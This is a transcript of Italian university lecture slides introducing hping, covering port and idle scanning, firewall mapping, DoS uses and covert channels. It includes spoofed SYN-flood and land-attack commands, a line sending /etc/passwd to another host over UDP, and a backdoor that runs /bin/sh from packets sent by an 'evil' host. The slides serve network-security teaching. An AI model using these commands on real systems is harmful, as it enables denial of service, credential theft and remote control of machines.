Introduzione ad hping
|
|
- Nicolo Leonardi
- 6 anni fa
- Visualizzazioni
Transcript
1 Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2007/2008 Introduzione ad hping Roberto Paleari 2-4 Settembre 2008 Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
2 Sommario 1 Funzionalità hping 2 scanning servizi di rete 3 Firewall mapping 4 hping come tool DoS 5 Trasferimento file via ICMP, UDP, TCP 6 hping come Trojan Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
3 Sommario 1 Funzionalità hping 2 scanning servizi di rete 3 Firewall mapping 4 hping come tool DoS 5 Trasferimento file via ICMP, UDP, TCP 6 hping come Trojan Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
4 Sommario 1 Funzionalità hping 2 scanning servizi di rete 3 Firewall mapping 4 hping come tool DoS 5 Trasferimento file via ICMP, UDP, TCP 6 hping come Trojan Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
5 Sommario 1 Funzionalità hping 2 scanning servizi di rete 3 Firewall mapping 4 hping come tool DoS 5 Trasferimento file via ICMP, UDP, TCP 6 hping come Trojan Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
6 Sommario 1 Funzionalità hping 2 scanning servizi di rete 3 Firewall mapping 4 hping come tool DoS 5 Trasferimento file via ICMP, UDP, TCP 6 hping come Trojan Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
7 Sommario 1 Funzionalità hping 2 scanning servizi di rete 3 Firewall mapping 4 hping come tool DoS 5 Trasferimento file via ICMP, UDP, TCP 6 hping come Trojan Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
8 Introduzione hping Caratteristiche del tool hping è uno strumento di rete capace sia di creare pacchetti di rete sia di sniffare pacchetti hping gestisce la frammentazione, gestisce pacchetti di grandezza arbitraria e l incapsulamento di protocolli portabile su molte architetture UNIX-like: Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X creato e sviluppato da un Italiano (Salvatore Sanfilippo a.k.a. antirez) Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
9 Funzionalità dello strumento hping Funzionalità hping testing di Firewall tecnica di scanning avanzata test delle reti, utilizzando diversi protocolli, TOS, frammentazione path MTU discovery manuale traceroute avanzato, con supporto a tutti i protocolli remote OS fingerprinting remote uptime guessing TCP/IP stack auditing strumento didattico per la comprensione dei protocolli di rete Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
10 hping come scanner (1) L attività di scanning del sistema permette ad un attaccante di reperire informazioni su quali porte (servizi di rete) sono aperti o filtrati sull host vittima. Esempio di Syn scan # hping -S idea.sec.dico.unimi.it -p 80 HPING idea.sec.dico.unimi.it (ppp ):... len=44 ip= ttl=50 DF id=0 sport=80 flags=sa seq=0 len=44 ip= ttl=50 DF id=0 sport=80 flags=sa seq=1... Se la risposta di ritorno contiene SA (syn/ack) allora la porta è aperta, se la risposta è RA (reset/ack) allora la porta è chiusa. Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
11 hping come scanner (2) Con hping si possono specificare tutti i flag TCP coinvolti per poter effettuare altri tipi di stealth scan: -F fin imposta FIN flag -S syn imposta SYN flag -R rst imposta RST flag -P push imposta PUSH flag -A ack imposta ACK flag -U urg imposta URG flag -X xmas imposta X flag -F ymas imposta Y flag Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
12 hping come scanner (3) Per poter effettuare l attività di scanning su diverse porte della macchina vittima tramite hping possiamo eseguire il seguente comando: # hping -S idea.sec.dico.unimi.it -p ++22 HPING idea.sec.dico.unimi.it (ppp ): len=40 ip= ttl=241 DF id=0 sport=22 flags=ra seq=0 len=40 ip= ttl=241 DF id=0 sport=23 flags=ra seq=1... Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
13 hping come scanner (4) Con hping si possono specificare tutti le opzioni del TCP potendo creare tutte le tecniche di scan: opzioni TCP -s baseport porta sorgente -p destport porta destinazione -w win grandezza finestra TCP -Q seqnum mostra numero di sequenza -b badcheck pachetto con checksum errato -M setseq imposta il numero di sequenza TCP -L setack imposta TCP ack Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
14 Idle scanning (1) L idle scan è una nuova tipologia di scanning inventata dallo stesso autore di hping, antirez. Ipotesi per L Idle scan (1) tre attori: il server vittima, una macchina chiamata Dumb, e la macchina da cui viene effettuato lo scan la macchina Dumb, incrementa in modo sequenziale l ID (Identification) la macchina Dumb non deve generare altro tipo di traffico di rete possibilità di effettuare lo spoofing tra la macchina server e la macchina da cui parte lo scan Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
15 Scenario: Idle scan Scenario L Idle scan la macchina da cui parte lo scan, pinga continuamente la macchina Dumb, e vede nei pacchetti di ritorno la risposta con id incrementato di 1 la macchina scan invia un pacchetto spoofato, indirizzo sorgente della macchina Dumb, TCP con syn attivato su una determinata porta all host vittima Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
16 Scenario: Idle scan (2) Scenario L Idle scan (2) si possono ricevere due tipo di risposte: SYN/ACK o RST, nel caso di RST, la macchina Dumb non creerà nessun nuovo pacchetto e cosi l ID rimarrà uguale nel caso del SYN/ACK la macchina Dumb, risponderà con un RST e l ID sarà incrementato di 1 Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
17 Scenario d esempio Scenario d esempio Attacker Syn Reset and Seq number Dumb Syn and IP spoofed None or Ack Victim Reset or Syn/Ack Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
18 Comandi hping: Idle scan Di seguito si vede la comunicazione con la macchina Dumb e lo spoofing del pacchetto inviato dall attaccante verso la vittima: # hping -I eth0 -SA -r HPING (eth ): SA set, 40 headers + 0 data bytes len=46 ip= flags=r seq=0 ttl=255 id=18 win=0... len=46 ip= flags=r seq=1 ttl=255 id=+1 win=0... len=46 ip= flags=r seq=2 ttl=255 id=+1 win= # hping -I eth0 -a S p ++20 HPING (eth ): S set, 40 headers + 0 data bytes... Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
19 Comandi hping: Idle scan La continua comunicazione con la macchina Dumb mostra che la porta 21 nel server vittima risulta nello stato open: # hping -I eth0 -r -S p ++20 HPING (eth ): S set, 40 headers + 0 data bytes len=46 ip= flags=ra seq=86 ttl=255 id=+1 win=0... len=46 ip= flags=ra seq=87 ttl=255 id=+2 win=0... (port 21) Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
20 Firewall mapping con hping Questa tecnica è utilizzata, per poter comprendere una topologia della rete, capire se ci sono firewall, funzionalità di traceroute. # hping3 -z -t 1 -S idea.sec.dico.unimi.it -p 22 TTL 0 during transit from ip= : TTL 0 during transit from ip= : TTL 0 during transit from ip= : TTL 0 during transit from ip= : len=40 ip= ttl=240 DF id=0 sport=22 flags=ra seq=16 win=0 rtt=73.9 ms Con questa tecnica si implementa il firewalking, potendo utilizzare però tutti i protocolli. Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
21 syn attack hping può essere usato come tool DoS per testare IDS e firewall. Un esempio può essere SYN attack. Con il seguente comando si effettua un attacco DoS # hping -a S p 80 -i u1000 -a spoof hostname, setta l indirizzo sorgente del host -S flag syn attivato -p porta destinazione -i intervallo di tempo per la spedizione dei pacchetti, e.g. u1000 (1000 microsecondi). Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
22 Land attack Un altro esempio di DoS, come consumo di risorse del sistema si può eseguire il seguente comando: # hping -S -a p 80 -i u1000 -a spoof hostname, setta l indirizzo sorgente del host -p porta destinazione -i intervallo di tempo per la spedizione dei pacchetti, e.g. u1000 (1000 microsecondi). Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
23 Spoofing control hping può essere utilizzato per testare la protezione dello spoofing su un firewall. # hping -S -a p 80 -i u1000 -S flag syn attivato -a indirizzo sorgente -p porta destinazione -i intervallo temporale di invio pacchetti Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
24 Trasferimento file È inoltre possibile inserire delle signature, valori ascii all interno del campo dati dei pacchetti. [host_a] # hping2 host_b --udp -p 53 -d sign signature --safe --file /etc/passwd [host_b] # hping2 host_a --listen signature --safe --udp sign inserisce la signature ascii nel campo data safe ritrasmissione dei pacchetti persi (e.g. UDP) file dati da trasmettere nel campo data Quando i dati arrivano dalla parte dell host B viene eseguito il dump dalla signature in poi. Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
25 hping come Trojan (1) può essere usato come backdoor, su una macchina compromessa. victim# hping -I eth0 --listen mysign /bin/sh evil$ telnet victim 25 Trying Connected to nano ( ). Escape character is ^]. 220 nano.marmoc.net ESMTP Sendmail mysignls; Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
26 hping come Trojan(2) Nel host vittima verrà mostrato l output del comando victim# hping -I eth0-9 mysign /bin/sh hping2 listen mode bin cdrom etc home local-home mnt root tmp var boot dev export lib lost+found proc sbin usr Roberto Paleari Introduzione ad hping 2-4 Settembre / 21
Introduzione ad hping
Introduzione ad hping Andrea Lanzi, Davide Marrone, Roberto Paleari Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Corso di Laurea in Informatica 10 gennaio 2007 Sommario
DettagliAttacchi di rete. Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007 Sommario 1 Introduzione al Portscanning 2 3 Sommario 1 Introduzione al Portscanning 2 3 Sommario
DettagliStrumenti per la raccolta di informazioni sulla rete - Information gathering -
Strumenti per la raccolta di informazioni sulla rete - Information gathering - Stefano Suin < Centro di Servizi per la rete di Ateneo Università di Pisa Stefano Suin - Information gathering
DettagliAttacchi di rete. Alessandro Reina Aristide A.A
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Attacchi di rete Alessandro Reina Aristide Fattori A.A.
DettagliSicurezza delle reti 1. Lezione IV: Port scanning. Stato di una porta. Port scanning. Mattia Monga. a.a. 2010/11
1 Mattia Lezione IV: Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo
DettagliIntroduzione allo sniffing
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Corso di Laurea in Informatica November 30, 2005 Sommario Introduzione alle chiamate socket 1 Introduzione alle chiamate
DettagliIntroduzione allo sniffing
Introduzione allo sniffing Andrea Lanzi, Davide Marrone, Roberto Paleari Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Corso di Laurea in Informatica 29 novembre 2006
DettagliUniversita di Milano - Polo di Crema Novembre Session Hijacking. Marco Cremonini 1. Marco Cremonini - Corso Integrativo Network Security 1
Session Hijacking Marco Cremonini 1 Marco Cremonini - Corso Integrativo Network Security 1 SESSION HIJACKING (lett. dirottare una sessione): una sessione attiva tra un client e un server viene dirottata
DettagliSicurezza delle reti. Monga. Ricognizione. Scanning Breve ripasso socket Network mapping Port Scanning NMAP. Le tecniche di scanning
Sicurezza dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it Port Lezione V: Scansioni Port a.a. 2015/16 1 cba 2011 15 M.. Creative Commons
DettagliTCP/IP: una breve introduzione
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2007/2008 TCP/IP: una breve introduzione Roberto Paleari 2-4 Settembre 2008 Roberto Paleari TCP/IP: una
DettagliIntroduzione. Concetti Preliminari Obiettivi. Portscanning. Scan Detector. Modello TCP/IP Three Way Handshake
Corso di Sicurezza su Reti anno 2001/ 2002 Rilevazione dei Relatori : Capuano Giuseppe Veropalumbo Edoardo Vittore Emanuele Docente del Corso : Prof. De Santis Alfredo Introduzione Concetti Preliminari
DettagliSicurezza delle reti. Monga. Ricognizione. Scanning Network mapping Port Scanning NMAP. Le tecniche di scanning. Ping. Sicurezza delle reti.
1 Mattia Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it Port Lezione IV: Scansioni Port a.a. 2011/12 1 c 2011 12 M.. Creative Commons Attribuzione-Condividi
DettagliTCP/IP. Transmission Control Protocol/ Internet Protocol
TCP/IP Transmission Control Protocol/ Internet Protocol!! APPLICATION http, ftp, smtp, ssh http, ftp, smtp, ssh TRANSPORT TCP, UDP Segment TCP, UDP NETWORK IP, ICMP Datagram IP, ICMP LINK ARP Frame ARP
DettagliNetwork Intrusion Detection
Network Intrusion Detection Maurizio Aiello Consiglio Nazionale delle Ricerche Istituto di Elettronica e di Ingegneria dell Informazione e delle Telecomunicazioni Analisi del traffico E importante analizzare
DettagliEsercitazione 05. Sommario. Packet Filtering [ ICMP ] Esercitazione Descrizione generale. Angelo Di Iorio
Sommario Esercitazione 05 Angelo Di Iorio Packet Filtering ICMP Descrizione esercitazione Applicazioni utili: Firewall: wipfw - netfilter Packet sniffer: wireshark ALMA MATER STUDIORUM UNIVERSITA DI BOLOGNA
DettagliTCP/IP: una breve introduzione
TCP/IP: una breve introduzione Andrea Lanzi, Davide Marrone, Roberto Paleari Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Corso di Laurea in Informatica 29 novembre
DettagliPolitecnico di Milano Dip. Elettronica e Informazione Milano, Italy Esempi di attacchi ai protocolli di rete
Politecnico di Milano Dip. Elettronica e Informazione Milano, Italy Esempi di attacchi ai protocolli di rete Ing. Stefano Zanero - 22/03/2006 Alcuni dei possibili tipi di attacco (1) Attacchi DOS (Denial
DettagliSicurezza delle reti 1
1 Mattia Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo 2.5 Italia
DettagliEsercitazione 05. Prima di iniziare. Packet Filtering [ ICMP ] Sommario. Angelo Di Iorio (Paolo Marinelli)
Prima di iniziare L ultima lezione (lunedì 7/12) sarà dedicata alla correzione dei quiz e discussione di eventuali dubbi e chiarimenti Esercitazione 05 Termine di consegna dei report: 8 Gennaio 2010, ore
DettagliTelematica di Base. IL Livello di Trasporto TCP
Telematica di Base IL Livello di Trasporto TCP TCP RFCs: 793, 1122, 1323, 2018, 2581 point-to-point: Un sender, un receiver affidabile protocollo di tipo pipeline: Meccanismi per evitare la congestione,
DettagliConfigurazione delle interfacce di rete
Configurazione delle interfacce di rete A.A. 2006/2007 Alessandro Botticelli Instradamento dei datagrammi IP Routing : scelta del percorso su cui inviare i dati i router formano struttura interconnessa
DettagliSicurezza delle reti. Monga. Il livello di trasporto. Problemi di sicurezza intrinseci. Riassunto. Porte. Sicurezza delle reti.
1 Mattia Lezione III: I protocolli di base Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi
DettagliStrumenti di raccolta di informazioni su topologia, utenti e servizi di una rete - Information gathering -
Strumenti di raccolta di informazioni su topologia, utenti e servizi di una rete - Information gathering - Stefano Suin Centro di Servizi per la rete di Ateneo Università di Pisa Stefano
DettagliIl coltellino svizzero della sicurezza
Hping Il tool perfetto per analizzare e forgiare pacchetti TCP/IP Il coltellino svizzero della sicurezza Grazie alle sue capacità, il software hping consente di verificare la sicurezza dei dispositivi
DettagliTCP/IP: summary. Lorenzo Cavallaro, Andrea Lanzi
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Corso di Laurea in Informatica December 7, 2004 Sommario 1 La suite di protocolli TCP/IP Layer 2 3 4 5 6 Sommario 1 La
DettagliIntroduzione. Scansione dei servizi di rete. Le porte (1) Internet Protocol. Le porte (2) Port Scanning. Cenni preliminari PortScan Satan Saint
Corso di sicurezza su reti a.a.2002/2003 Introduzione Scansione dei servizi Docente del corso: Prof. De Santis Alfredo A cura di: Miele Alessandro Pagnotta Simona Cenni preliminari PortScan Satan Saint
DettagliTransmission Control Protocol
Transmission Control Protocol Franco Callegati Franco Callegati IC3N 2000 N. 1 Transmission Control Protocol - RFC 793 Protocollo di tipo connection-oriented Ha lo scopo di realizzare una comunicazione
DettagliBOLLETTINO DI SICUREZZA INFORMATICA
STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 4/2008 Il bollettino può essere
DettagliIl protocollo TCP. Obiettivo. Procedura
Il protocollo TCP Obiettivo In questo esercizio studieremo il funzionamento del protocollo TCP. In particolare analizzeremo la traccia di segmenti TCP scambiati tra il vostro calcolatore ed un server remoto.
DettagliIl firewall Packet filtering statico in architetture avanzate
protezione delle reti Il firewall Packet filtering statico in architetture avanzate FABIO GARZIA DOCENTE ESPERTO DI SECURITY UN FIREWALL PERIMETRALE È IL PUNTO CENTRALE DI DIFESA NEL PERIMETRO DI UNA RETE
DettagliUniversità degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2013/2014. Attacchi di rete.
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2013/2014 Attacchi di rete Andrea Lanzi 4 Giugno 2013 Andrea Lanzi Attacchi di rete 4 Giugno 2013 1 /
DettagliProf. Filippo Lanubile
Firewall e IDS Firewall Sistema che costituisce l unico punto di connessione tra una rete privata e il resto di Internet Solitamente implementato in un router Implementato anche su host (firewall personale)
DettagliICMP. (Internet Control Message Protocol) Cosa è l ICMP? Messaggi di ICMP. Applicazioni di ICMP: ULP, Ping, Traceroute, Path MTU discovery
ICMP (Internet Control Message Protocol) Cosa è l ICMP? Messaggi di ICMP Applicazioni di ICMP: ULP, Ping, Traceroute, Path MTU discovery ICMP 1 Formato pacchetti ICMP fa parte dello stack TCP/IP Formato
DettagliNetwork Scanning: Tecniche & Politiche
Network Scanning: Tecniche & Politiche Gruppo 4 Sebastiano Vascon 788442 me@xwasco.com 1 Cos'è il Network Scanning? E' una tecnica utilizzata per analizzare i computer presenti su una rete. La utilizzano
DettagliIL LIVELLO TRASPORTO Protocolli TCP e UDP
Reti di Calcolatori ed Internet IL LIVELLO TRASPORTO Protocolli TCP e UDP 5-1 Il Livello Trasporto I servizi del livello Trasporto Le primitive di Trasporto Indirizzamento Protocolli di Trasporto Livello
DettagliProva di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 7 Febbraio 2005, ore 15.00
Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 7 Febbraio 2005, ore 15.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome: Nome:
DettagliI protocolli UDP e TCP
I protocolli UDP e TCP A.A. 2005/2006 Walter Cerroni Il livello di trasporto in Internet APP. APP. TCP UDP IP collegamento logico tra diversi processi applicativi collegamento logico tra diversi host IP
DettagliCorso di Sicurezza (Informatica): Introduzione
Corso di Sicurezza (Informatica): Introduzione F49076, F58019, F26095, F47084, F28081 Laurea Triennale Roberto Paleari, Alessandro Rinaldi Università degli Studi di Milano Facoltà di Scienze Matematiche,
DettagliLezione 4: Introduzione a L3, il protocollo ARP
Lezione 4: Introduzione a L3, il protocollo ARP Università degli Studi di Milano Insegnamento di Introduzione 1 Il livello 3, anche detto livello di rete, è quello che permette la trasmissione logica tra
DettagliIL LIVELLO TRASPORTO Protocolli TCP e UDP
Reti di Calcolatori IL LIVELLO TRASPORTO Protocolli TCP e UDP D. Talia RETI DI CALCOLATORI - UNICAL 5-1 Il Livello Trasporto I servizi del livello Trasporto Le primitive di Trasporto Indirizzamento Protocolli
DettagliUniversità degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2012/2013. Attacchi di rete
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2012/2013 Attacchi di rete Srdjan Matic, Aristide Fattori 10 Maggio 2013 Srdjan Matic, Aristide Fattori
DettagliIl protocollo IP A.A. 2005/2006. Walter Cerroni
Il protocollo ICMP A.A. 2005/2006 Walter Cerroni Il protocollo IP offre un servizio di tipo best effort non garantisce la corretta consegna dei datagrammi se necessario si affida a protocolli affidabili
DettagliProf. Mario Cannataro Ing. Giuseppe Pirrò
Prof. Mario Cannataro Ing. Giuseppe Pirrò Footprinting Scansione Enumerazione Exploit Controllo del sistema Raccolta di informazioni sull obbiettivo da attaccare. Determinare il profilo di protezione della
DettagliTre catene (chains) di base, si possono definire altre catene (convenzionalmente in minuscolo)
iptables passo-passo Prima del kernel 2.0 ipfwadm, dal kernel 2.2 ipchains, dopo il kernel 2.4 iptables Firewall (packet filtering, Nat (Network Address Translation)) NetFilter (layer del kernel per il
Dettagli(parte 2) DHCP e NAT
Marco Listanti Strato di rete (parte 2) DHCP e NAT Autoconfigurazione ur n Protocollo DHCP Telecomunicazioni Fondamenti di reti - Prof. Marco Listanti - A.A. 2010/2011 2008/2009 Configurazione degli Host
DettagliStrato di rete (parte 2) Autoconfigurazione Protocollo DHCP
Strato di rete (parte 2) Autoconfigurazione Protocollo DHCP 1 Configurazione degli Host Un host deve essere configurato IP address Subnet mask Default router Server DNS Procedura manuale Necessità di procedure
Dettaglivittorio.prisco@email.it INTRODUZIONE ALLA SICUREZZA DELLE RETI V. Prisco
1 INTRODUZIONE ALLA SICUREZZA DELLE RETI Vittorio Prisco 2 PERCHÉ LE VULNERABILITÀ La vulnerabilità delle informazioni è in aumento perchè: le informazioni detenute dalle organizzazioni hanno valore superiore
Dettaglila trasmissione è regolata solamente dall algoritmo per il controllo del flusso prima di inviare l ACK.
1. Considerare il problema della stima del Round Trip Time. Supporre che inizialmente RTT valga 200 ms. Il mittente invia un segmento e riceve l ACK relativo dopo 100 ms, quindi invia un altro segmento,
DettagliBOLLETTINO DI SICUREZZA INFORMATICA
STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 3/2008 Il bollettino può essere
Dettagliesercizi su sicurezza delle reti 2006-2008 maurizio pizzonia sicurezza dei sistemi informatici e delle reti
esercizi su sicurezza delle reti 20062008 maurizio pizzonia sicurezza dei sistemi informatici e delle reti 1 supponi i fw siano linux con iptables dai una matrice di accesso che esprima la policy qui descritta
DettagliIL PROTOCOLLO ICMP. La famiglia dei protocolli TCP/IP. Applicazioni ,ftp,telnet,www. IEEE 802-Ethernet-X25-Aloha ecc. Collegamento fisico
IL PROTOCOLLO ICMP La famiglia dei protocolli TCP/IP Applicazioni e-mail,ftp,telnet,www ICMP TCP IP UDP ARP IEEE 802-Ethernet-X25-Aloha ecc. Collegamento fisico Walter Cerroni 2 1 Il protocollo IP offre
DettagliSicurezza delle reti 1. Uso di variabili. Mattia Monga. a.a. 2010/11
1 Mattia Lezione VIII: Sicurezza perimetrale Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi
DettagliEsercitazione 05. Sommario. Packet Filtering [ ICMP ] Esercitazione Descrizione generale. Angelo Di Iorio (Paolo Marinelli)
Sommario Esercitazione 05 Angelo Di Iorio (Paolo Marinelli)! Packet Filtering ICMP! Descrizione esercitazione! Applicazioni utili: " Firewall: wipfw - netfilter " Packet sniffer: wireshark!"#!$#!%&'$(%)*+,')#$-!"#!$#!%&'$(%)*+,')#$-
DettagliTCP: trasmissione Source port [16 bit] - Identifica il numero di porta sull'host mittente associato alla connessione TCP. Destination port [16 bit] - Identifica il numero di porta sull'host destinatario
DettagliFIREWALL. Firewall - modello OSI e TCP/IP. Gianluigi Me. me@disp.uniroma2.it Anno Accademico 2005/06. Modello OSI. Modello TCP/IP. Application Gateway
FIREWALL me@disp.uniroma2.it Anno Accademico 2005/06 Firewall - modello OSI e TCP/IP Modello TCP/IP Applicazione TELNET FTP DNS PING NFS RealAudio RealVideo RTCP Modello OSI Applicazione Presentazione
DettagliCorner Banca. Ethical Hacking. Analisi delle Vulnerabilità del sistema di autorizzazione delle transazioni. con carte di credito MasterCard e VISA
Corner Banca Ethical Hacking Analisi delle Vulnerabilità del sistema di autorizzazione delle transazioni con carte di credito MasterCard e VISA Milano Hacking Team S.r.l. http://www.hackingteam.it Via
DettagliReti di Calcolatori. IL LIVELLO TRASPORTO Protocolli TCP e UDP
Reti di Calcolatori IL LIVELLO TRASPORTO Protocolli TCP e UDP D. Talia RETI DI CALCOLATORI - UNICAL 5-1 Il Livello Trasporto I servizi del livello Trasporto Le primitive di Trasporto Indirizzamento Protocolli
Dettaglimaurizio pizzonia sicurezza dei sistemi informatici e delle reti. esercizi su sicurezza delle reti
20062010 maurizio pizzonia sicurezza dei sistemi informatici e delle reti esercizi su sicurezza delle reti 1 20062010 maurizio pizzonia sicurezza dei sistemi informatici e delle reti screened subnet gastone.2
DettagliSoftware per l individuazione dei malfunzionamenti di rete
Software per l individuazione dei malfunzionamenti di rete ForTIC Percorso Formativo C2 Modulo 4 Fabio Calefato - ForTIC / C2 / Modulo 4 1 Strumenti utili ipconfig / ifconfig ping tracert / traceroute
Dettaglivulnerabilità delle reti maurizio pizzonia sicurezza dei sistemi informatici e delle reti
vulnerabilità delle reti 1 reti e protocolli vulnerabili gran parte delle vulnerabilità delle reti sono in realtà vulnerabilità dei protocolli inserire la sicurezza in un protocollo significa costringere
Dettagli/00$)#)+#// )#$ $ )""#,+#)#())# "# #$##( #%# $ )/ #//, #/ $#%# $# )""# +# $ +,+#) 1/-- $234&( + 20%)* /&) 6 / /00$)#"( 7 6$
STATO MAGGIORE DIFESA Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa !"# $# %$&#" # $'& #()*#%# )+ && +#)* # $# )""#,+#)#-.$ ## /00$)#)+#// )#$ $ )""#,+#)#())# "# #$##( #%# $ )/ #//, #/ $#%#
DettagliFirewall. Protezione perimetrale e sistemi anti intrusione
Firewall Protezione perimetrale e sistemi anti intrusione Dispositivi di sicurezza Internet è un ambiente poco sicuro. Si rischia di subire ogni tipo di frode. Per l amministratore della rete di una organizzazione
DettagliCorso MIUR C2 Modulo 8. Firewall. Ing. Giampaolo Mancini Ing. Fabio De Vito
Corso MIUR C2 Modulo 8 Firewall Ing. Giampaolo Mancini Ing. Fabio De Vito 11/02/04 15.15.03 Sommario Concetto di firewalling Funzionalità di un firewall Filtro sui pacchetti in ingresso Filtro sui pacchetti
DettagliFirewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.
Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere
DettagliInternet (- working). Le basi.
Internet (- working). Le basi. 1 GABRIELLA PAOLINI (GARR) 18 OTTOBRE 2011 Capire come funziona Internet 2 FACCIAMO UN PASSO INDIETRO Internet È un insieme di reti interconnesse fra di loro su tutto il
DettagliUn sistema di Network Intrusion Detection basato su tcpdump
I INFN Security Workshop Firenze 19-20 Settembre 2000 Un sistema di Network Intrusion Detection basato su tcpdump Massimo Gravino INFN Sezione di Padova Perche` utilizzare un sistema di Network Intrusion
DettagliSicurezza dei calcolatori e delle reti. Attacchi di rete Lez. 8
Sicurezza dei calcolatori e delle reti Attacchi di rete Lez. 8 Attacchi su Local Area Network Obiettivi Impersonificazione di un host Denial of Service (DoS) Accesso a informazioni sensibili Tecniche Sniffing
DettagliAppello 18 Luglio Importante: usare lo spazio dopo ogni esercizio per le risposte. Esercizio 1 Esercizio 2 Esercizio 3 Domande Laboratorio
Infrastrutture e Protocolli per Internet Proff. A. Capone M. Cesana Appello 8 Luglio 008 Cognome Nome Matricola Tempo Disponibile: ore Importante: usare lo spazio dopo ogni esercizio per le risposte. Esercizio
DettagliSoluzione dell esercizio 2 (TCP) dell esame del 16 giugno 2015
Soluzione dell esercizio 2 (TCP) dell esame del 16 giugno 2015 La soluzione di questo esercizio per quanto riguarda la parte di perdita di pacchetti è data assumendo l'algoritmo di FAST RECOVERY, ossia
DettagliLezione n.9 LPR- Informatica Applicata
Lezione n.9 LPR- Informatica Applicata LINUX Gestione della Rete 3/4/2006 Laura Ricci Laura Ricci 1 INDIRIZZI RISERVATI Alcuni indirizzi all interno di una rete sono riservati: indirizzo di rete e broadcast.
DettagliIntroduzione allo sniffing
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2007/2008 Introduzione allo sniffing Roberto Paleari 2-4 Settembre 2008 Roberto Paleari Introduzione
DettagliSommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione
Sesta Esercitazione Sommario Introduzione ai firewall Definizione e scopo Classificazione Firewall a filtraggio dei pacchetti Informazioni associate alle regole Interpretazione delle regole Il firewall
DettagliLinux: Organizzazione filesystem
Linux: Mirko Mariotti Dipartimento di Fisica - Università degli studi di Perugia March 13, 2007 Outline 1 Indice 2 Significato degli elementi in / La struttura dei file in un sistema UNIX è rappresentabile
DettagliSniffJoke eviscerated. http://www.delirandom.net/sniffjoke
SniffJoke eviscerated http://www.delirandom.net/sniffjoke SniffJoke eviscerated Come funziona uno sniffer, Come ricostruisce i flussi TCP Quindi si basa su delle assunzioni E se noi le facciam crollare?
DettagliElementi sull uso dei firewall
Laboratorio di Reti di Calcolatori Elementi sull uso dei firewall Carlo Mastroianni Firewall Un firewall è una combinazione di hardware e software che protegge una sottorete dal resto di Internet Il firewall
DettagliProva completa - Rete Internet (ing. Giovanni Neglia) Lunedì 25 Giugno 2007
